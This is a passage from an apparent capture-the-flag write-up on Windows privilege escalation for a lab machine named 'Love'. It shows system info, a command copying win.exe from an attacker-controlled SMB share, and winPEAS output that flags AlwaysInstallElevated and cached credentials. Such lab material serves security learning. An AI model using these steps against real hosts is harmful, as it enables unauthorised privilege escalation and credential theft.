3 privesc

systeminfo

Host Name:                 LOVE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
System Type:               x64-based PC

PEAS

copy \\10.10.14.119\drive\win.exe
       1 file(s) copied.
   	
[+] Cached Creds
  [?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials
   cachedlogonscount is 10
   
[+] UAC Status
  [?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
   ConsentPromptBehaviorAdmin: 0 - No prompting
   EnableLUA: 1
   LocalAccountTokenFilterPolicy: 1
   FilterAdministratorToken: 0
     [*] LocalAccountTokenFilterPolicy set to 1.
     [+] Any local account can be used for lateral movement.

[+] PowerShell Settings
   PowerShell v2 Version: 2.0
   PowerShell v5 Version: 5.1.19041.1
   PowerShell Core Version:
   Transcription Settings:
   Module Logging Settings:
   Scriptblock Logging Settings:
   PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
   PS history size: 51B

[+] Checking AlwaysInstallElevated
  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
   AlwaysInstallElevated set to 1 in HKLM!
   AlwaysInstallElevated set to 1 in HKCU!
   
[+] Enumerating NTLM Settings
LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default

Using https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated

PreviousLOVENext2 :80

Last updated